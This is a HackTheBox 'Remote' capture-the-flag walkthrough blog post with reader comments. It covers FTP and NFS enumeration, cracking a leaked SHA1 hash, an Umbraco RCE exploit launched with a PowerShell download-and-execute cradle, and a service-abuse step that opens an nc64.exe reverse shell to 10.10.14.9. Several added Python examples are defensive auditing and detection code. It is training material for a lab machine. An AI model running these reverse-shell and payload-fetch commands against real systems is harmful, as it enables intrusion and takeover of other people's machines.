Remote HacktheBox Walkthrough

[Screenshot: Remote HackTheBox banner]

This is the Remote HackTheBox walkthrough. In this writeup I show how I exploited the Remote machine and obtained the root flag. The machine is given difficulty level low by its maker. So without wasting time, let's jump into the box. Connect your PC to the VPN so that you can reach the Remote machine. Once connected, confirm access by pinging 10.10.10.180 (the IP of the Remote HTB machine).

Now I will show how I got root on this machine.

First I scanned 10.10.10.180 to find the open ports and banner-grab the services running on them. For this I used nmap (a network port scanner). Here is the result:

Port Scanning

$ nmap -sC -sV -oA scan 10.10.10.180

[Screenshot: Remote HackTheBox nmap scan result]

The nmap result shows port 21 open with an FTP service running on it, and anonymous login is allowed, which is interesting. So first I tried to log in with the credentials anonymous : anonymous, and the login succeeded.

Anonymous FTP Login

$ ftp 10.10.10.180

[Screenshot: FTP anonymous login]

All commands worked but showed no output. I then tried to upload a blank text file named inject.txt, but got a permission denied error. Next I tried to download every shared file (if any) from the FTP server, in case I had missed some files through the anonymous login.

$wget -m ftp://anonymous:[email protected]

[Screenshot: downloading all FTP files from the Remote machine]

It appeared that there is nothing to download, or that we don't have enough permission to access the files.

That's all for the FTP service. Let's move on to the other services.

Enumerating on Port 80

Port 80 is open, so there may be a web server running on it. Let's check.

After scrolling to the bottom of http://10.10.10.180/ I saw "Umbraco HQ", and on the product page "Umbraco" was printed on a jacket. There were also some balls, each with "Umbraco" written on it. I didn't know why the same word appeared on every page, all pointing to Umbraco.

I seriously didn't know. I downloaded the image of the man from http://10.10.10.180/media/1002/18095416144_44a566a5f4_h.jpg by right-clicking it and then searched for 18095416144_44a566a5f4_h.jpg on Google. Luckily, the third link was https://our.umbraco.com/documentation/Umbraco-Heartcore/API-Documentation/Content-Management/media/ and that page showed that Umbraco is actually a CMS (a Content Management System, just like WordPress).

This confirmed that the website runs on the Umbraco CMS, an open source content management system.

Tip: If you find a CMS in use, check GitHub for a scanner dedicated to that particular CMS. If one exists, scan the website with it; this may give faster and more accurate results.

At this point I knew which CMS the website runs on. To proceed I needed the CMS installation folder and the CMS version, so that I could search for a public exploit. I left this for now and tried to find some other means of getting the installation folder and version. I also could not find any Umbraco CMS scanner on GitHub.

Port 111 is open and running the rpcbind service; let's enumerate it. The nmap report shows rpcinfo (Remote Procedure Call information) and a list of ports along with their services. To confirm these and eliminate false positives you can run the rpcinfo command, which reveals the services actually registered.

Checking RPCinfo

$ rpcinfo -p 10.10.10.180

[Screenshot: rpcinfo check]

rpcinfo revealed that nfs (Network File System) and mountd are running, so I used the showmount command to list the directories that can be mounted on our local machine.

Checking Mount Directory

$ showmount --exports 10.10.10.180

[Screenshot: Remote machine mount check]

The showmount command reveals that /site_backups can be mounted on our local machine.
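The reason this step works at all is that the export has no client restriction: showmount prints "(everyone)" for an export that any host may mount. The following added example (my code, not part of the walkthrough) parses showmount output and flags exactly that condition, which is the check a defender would run against their own NFS servers. The sample output is constructed; only the /site_backups export comes from the page.

```python
"""Audit NFS export lists for world-mountable shares (added example)."""
import ipaddress
import re

# Constructed sample of `showmount -e` output. Only /site_backups is on the
# page; the other two exports are made up to show restricted client lists.
SAMPLE_SHOWMOUNT = """\
Export list for 10.10.10.180:
/site_backups (everyone)
/srv/ro       10.10.14.0/24
/home/dev     10.10.14.9,10.10.14.10
"""

# Client entries that mean "any host" (assumption: these are the forms seen
# from Linux showmount and from a hand-written exports file).
WILDCARDS = {"(everyone)", "*", "0.0.0.0/0"}


def parse_showmount(text):
    """Return a list of (export_path, [client, ...]) from showmount -e output."""
    exports = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list"):
            continue                       # header line or blank
        path, _, clients = line.partition(" ")
        client_list = [c for c in re.split(r"[,\s]+", clients.strip()) if c]
        exports.append((path, client_list))
    return exports


def is_world_mountable(clients):
    """True if any client entry lets every host mount the export."""
    for client in clients:
        if client in WILDCARDS:
            return True
        try:
            # A /0 network (IPv4 or IPv6) is also "everyone".
            if ipaddress.ip_network(client, strict=False).prefixlen == 0:
                return True
        except ValueError:
            pass                           # hostname or netgroup, not an address
    return False


def audit_exports(text):
    """Return the export paths that any host on the network can mount."""
    return [path for path, clients in parse_showmount(text)
            if is_world_mountable(clients)]


if __name__ == "__main__":
    for path in audit_exports(SAMPLE_SHOWMOUNT):
        print(f"[!] world-mountable export: {path}")
```

Run against real output with `showmount -e HOST | python audit_exports.py` after replacing the sample with `sys.stdin.read()`. The fix for a finding is to restrict the client list of the export to the hosts that need it; a backup share that contains Web.config and the site database should not be reachable by every client on the network.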

So I mounted the directory /site_backups on my local computer inside the folder mounted_folder in the /tmp directory:

Mounting to Local Computer

$ mount --types nfs 10.10.10.180:/site_backups /tmp/mounted_folder/

[Screenshot: Remote machine share mounted on the local computer]

Inside mounted_folder I found an Umbraco folder, so the Umbraco installation URL is http://10.10.10.180/Umbraco/. Next I needed the Umbraco version. I had no idea which file holds it, so I googled, and that gave me the answer. The version is 7.12.4, found with

$ grep 'umbracoConfigurationStatus' Web.config

[Screenshot: Umbraco version search]
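The grep matches an appSettings entry in Web.config; Umbraco 7 stores the installed version there under the key umbracoConfigurationStatus, and the same file names the admin path under umbracoPath. The added example below (my code, not from the walkthrough or from Umbraco) reads those values by parsing the XML rather than grepping, and compares the version numerically against a minimum. The Web.config fragment is constructed and the "7.15.0" threshold is an assumed policy value, not a fixed version named on the page.

```python
"""Extract the Umbraco version from Web.config and compare it numerically."""
import xml.etree.ElementTree as ET

# Constructed Web.config fragment shaped like an Umbraco 7 file. The
# umbracoConfigurationStatus value is the one the walkthrough found.
SAMPLE_WEB_CONFIG = """\
<configuration>
  <appSettings>
    <add key="umbracoConfigurationStatus" value="7.12.4" />
    <add key="umbracoReservedPaths" value="~/umbraco,~/install/" />
    <add key="umbracoPath" value="~/umbraco" />
  </appSettings>
</configuration>
"""


def read_app_setting(xml_text, key):
    """Return the value of <add key=... value=...> under appSettings, or None."""
    root = ET.fromstring(xml_text)
    for add in root.iterfind("./appSettings/add"):
        if add.get("key") == key:
            return add.get("value")
    return None


def umbraco_version(xml_text):
    """Version string recorded by the Umbraco installer, or None if absent."""
    return read_app_setting(xml_text, "umbracoConfigurationStatus")


def version_tuple(version):
    """'7.12.4' -> (7, 12, 4): compare as integers, not as strings."""
    return tuple(int(part) for part in version.split("."))


def is_below(version, minimum):
    """True when the installed version is older than the required minimum."""
    return version_tuple(version) < version_tuple(minimum)


if __name__ == "__main__":
    version = umbraco_version(SAMPLE_WEB_CONFIG)
    print("Umbraco version:", version)
    print("admin path:", read_app_setting(SAMPLE_WEB_CONFIG, "umbracoPath"))
    # "7.15.0" is an assumed policy threshold, not a version named on the page.
    print("below assumed minimum 7.15.0:", is_below(version, "7.15.0"))
```

The tuple comparison matters: as plain strings "7.9.0" sorts after "7.12.4", so a string comparison would wrongly report an older install as up to date.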

As soon as I had the Umbraco version, I searched for available exploits with searchsploit (a command-line tool for searching the Exploit-DB database). It returned an authenticated remote code execution exploit (46153.py).

Search Available Exploits

$ searchsploit Umbraco 7.12.4

[Screenshot: searchsploit result]

Going to http://10.10.10.180/umbraco gave a login panel asking for a username and password. I tried the default credentials admin : admin and admin : password, but they failed. So I searched our mounted_folder for credentials.

After some enumeration I found a file named Umbraco.sdf (an .sdf file holds a SQL database in compact form). I used the strings command to view its readable content and grepped for admin, as shown below:

$ strings Umbraco.sdf | grep admin

[Screenshot: admin credential in Umbraco.sdf]

It contains the username [email protected] and a password hash in SHA1 form: b8be16afba8c314ad33d812f22a04991b90e2aaa. I searched for the hash in some public online databases and luckily crackstation.net returned its password, baconandcheese. So the login credentials are [email protected] : baconandcheese.

[Screenshot: password hash search result]

Tip: If you get a hash, first search for it in online databases such as crackstation.net to see whether its plaintext is already known. If it is not found, crack it on your own machine with a custom wordlist using John the Ripper or Hashcat.
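The lookup and the Tip both rest on one fact: an unsalted SHA1 hash can be reversed by hashing candidates until one matches, which is all a lookup service does. The added example below (my code, not from the walkthrough) performs that check locally against a constructed wordlist and, beside it, shows the storage form a defender should use instead (PBKDF2 with a random salt and many iterations), under which the same leaked database would not yield a password to a lookup table. The hash constant is the one quoted above; the wordlist and iteration counts are constructed.

```python
"""Unsalted SHA1 lookup versus salted, iterated password storage (added example)."""
import hashlib
import hmac
import os

# Hash quoted in the walkthrough (unsalted SHA1, hex encoded).
RECOVERED_HASH = "b8be16afba8c314ad33d812f22a04991b90e2aaa"

# Constructed stand-in for a real wordlist.
SAMPLE_WORDLIST = ["password", "admin", "letmein", "baconandcheese", "umbraco"]


def sha1_hex(plaintext):
    """Unsalted SHA1 hex digest, the form found in Umbraco.sdf."""
    return hashlib.sha1(plaintext.encode("utf-8")).hexdigest()


def find_password(target_hex, candidates):
    """Return the first candidate whose SHA1 equals target_hex, or None.

    With no salt, one precomputed table serves every user and every site,
    which is why an online database could answer instantly.
    """
    target = target_hex.strip().lower()
    for word in candidates:
        if sha1_hex(word) == target:
            return word
    return None


def pbkdf2_record(plaintext, salt=None, iterations=600_000):
    """Salted, iterated hash: a per-user salt defeats shared lookup tables
    and the iteration count makes each guess expensive."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", plaintext.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(record, plaintext):
    """Recompute the derivation from the stored salt and compare in constant time."""
    _, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", plaintext.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    hit = find_password(RECOVERED_HASH, SAMPLE_WORDLIST)
    print("SHA1 wordlist lookup:", hit if hit else "no match in wordlist")
    record = pbkdf2_record("baconandcheese")
    print("stored as:", record)
    print("verifies:", pbkdf2_verify(record, "baconandcheese"))
```

Two records of the same password differ because each carries its own salt, so a table built from one leak is useless against another; that is the property the unsalted SHA1 in Umbraco.sdf lacks.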

Since Umbraco 7.12.4 has an authenticated RCE vulnerability, I searched GitHub for an Umbraco RCE exploit and its usage, found https://github.com/noraj/Umbraco-RCE and downloaded it. Then I downloaded the PowerShell script Invoke-PowerShellTcp.ps1 from https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

which connects back to the netcat listener on our PC. I replaced the old IP address with my local PC's IP address and set the port to 5555.

I started a Python HTTP server in one window and, in another, a netcat listener wrapped in rlwrap. rlwrap makes backspace and tab work smoothly once we have the remote shell. Then I ran the exploit:

Exploit Execution

$ python exploit.py -u [email protected] -p baconandcheese -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1')"

Start Python Http Server

$ python3 -m http.server 80

Start NetCat Listener

$ rlwrap nc -nvlp 5555

[Screenshot: initial remote shell]

Got a remote shell. So with this exploit I successfully logged into the remote PC.

$ ipconfig

[Screenshot: Remote machine IP address]

Gathering some useful info

$ systeminfo

[Screenshot: Remote machine systeminfo]

Let's grab the user flag

$ type \Users\Public\user.txt

[Screenshot: Remote user flag]

Privilege Escalation

Finding PrivEsc Vector

To escalate privileges to administrator level, I first had to identify a privilege escalation vector; only then could I move on to exploitation. I used the PowerUp.ps1 script, run on the remote machine, to look for possible privilege escalation vectors. The first command below loads it directly on the remote PC; after that, don't forget to invoke all checks.

Running PrivEsc Script

$ IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/PowerUp.ps1')

$ Invoke-AllChecks

Tip: Every time you get access to a PC, run an enumeration script so that you get information about possible privilege escalation vectors.

[Screenshot: privilege escalation script result]

The service UsoSvc could be our privilege escalation vector. Let's try to exploit it. To exploit this service we need a program on the remote machine that will execute a command and connect back to this PC. So I downloaded netcat from https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip and transferred nc64.exe from my PC to the remote machine. Finally I ran the service abuse command given in the PowerUp.ps1 output to get an administrative remote shell.

Download nc64.exe to Remote

$ certutil.exe -urlcache -f http://10.10.14.9/nc64.exe C:\Windows\Temp\nc64.exe

Start Python Http Server Locally

$ python3 -m http.server 80

Start NetCat Listener Locally

$ rlwrap nc -nvlp 1234

Run the Service Abuse Command

$ Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command "C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe"

[Screenshot: privilege escalation]

We can see that we successfully got an administrative shell. Now we can get the root flag.

[Screenshot: Remote machine root flag]
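What Invoke-ServiceAbuse does underneath is rewrite the service's binary path so that the next start of UsoSvc runs the file placed in C:\Windows\Temp. That write is visible to a defender: Sysmon Event ID 13 (registry value set) records changes to a service's ImagePath value, including the process that made the write. The added example below (my code, not from the walkthrough or from PowerUp) scans such records and flags any ImagePath that now points outside trusted program directories. The event records, the field layout and the trusted-directory list are constructed assumptions, not real logs from the machine.

```python
"""Flag service ImagePath changes that point outside trusted directories."""
import re

# Registry value that holds a service's command line (case-insensitive match).
SERVICE_IMAGEPATH = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)

# Where legitimate service binaries are expected to live (assumption; tune per host).
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed records shaped like Sysmon Event ID 13 fields:
# (UtcTime, Image that performed the write, TargetObject, Details). Not real logs.
SAMPLE_EVENTS = [
    ("2020-03-21 10:01:02", r"C:\Windows\System32\services.exe",
     r"HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath",
     r"%SystemRoot%\system32\svchost.exe -k netsvcs -p"),
    ("2020-03-21 10:05:44", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath",
     r"C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe"),
    ("2020-03-21 10:06:10", r"C:\Windows\System32\services.exe",
     r"HKLM\System\CurrentControlSet\Services\UsoSvc\Start",
     "DWORD (0x00000002)"),
]


def service_name(target_object):
    """Return the service whose ImagePath this registry path belongs to, else None."""
    match = SERVICE_IMAGEPATH.match(target_object)
    return match.group(1) if match else None


def binary_from_command(details):
    """Extract the executable from an ImagePath value, quoted or unquoted."""
    command = details.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ")[0]


def is_trusted_path(path):
    """True when the binary sits under TRUSTED_DIRS after expanding %SystemRoot%."""
    normalized = path.lower().replace("%systemroot%", "c:\\windows")
    return normalized.startswith(TRUSTED_DIRS)


def find_suspicious_imagepath_changes(events):
    """Return ImagePath writes whose new binary lives outside the trusted directories."""
    hits = []
    for when, writer, target, details in events:
        service = service_name(target)
        if service is None:
            continue                       # some other value, e.g. Start type
        binary = binary_from_command(details)
        if not is_trusted_path(binary):
            hits.append({"time": when, "service": service,
                         "writer": writer, "binary": binary})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_imagepath_changes(SAMPLE_EVENTS):
        print(f"[!] {hit['time']} {hit['service']} ImagePath -> {hit['binary']} "
              f"(written by {hit['writer']})")
```

The writer field is as telling as the path: services.exe normally owns these values, so an ImagePath rewritten by powershell.exe or cmd.exe deserves a look even when the new path happens to be under a trusted directory. Hardening the cause rather than the symptom means not granting service configuration rights on UsoSvc (or any service) to ordinary users, which is the misconfiguration PowerUp reported.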

I hope you have learned something from this Remote HackTheBox walkthrough and my methodology. If so, please leave a comment in the comment section. For any query or suggestion, feel free to contact us at [email protected]

This Post Has 8 Comments

  1. Abel Acosta

    Could you send me the PowerUp.ps1? I'd be grateful.

  2. hokapefr

    Hi,

    It seems that this part is not functional anymore:

    Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command "C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe"

    Start-Service : Service 'Update Orchestrator Service (UsoSvc)' cannot be started due to the following error: Cannot
    start service UsoSvc on computer '.'.
    At line:1812 char:34
    + … $TargetService | Start-Service -ErrorAction SilentlyContinue
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : OpenError: (System.ServiceProcess.ServiceController:ServiceController) [Start-Service],
    ServiceCommandException
    + FullyQualifiedErrorId : CouldNotStartService,Microsoft.PowerShell.Commands.StartServiceCommand

    I worked around it by doing this:

    Set-ServiceBinPath -ServiceName 'UsoSvc' "C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe"
    Restart-Service UsoSvc

    NOTICE: the service is only functional for around 5 minutes, enough to catch the root flag, but why is it broken after this time period? Antivirus?

    Very good job done in this walkthrough!!

    Thanks,

  3. Noob

    How were you able to get a reverse shell without giving the tun0 IP and port, and where did you define port 5555 in the script??

  4. Deepak Kumar Maurya

    I changed the IP address to the tun0 IP and the port to 5555 in the PowerShell script PowerShellTcp.ps1 before downloading it to the Remote HTB machine through the Python HTTP server.

  5. Term

    Can you explain to me exactly what this PowerShell statement does: -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1')"

    1. Deepak Kumar Maurya

      This statement downloads and executes the Invoke-PowerShellTcp.ps1 script on the remote machine in one step, by loading it into memory.


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter and CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/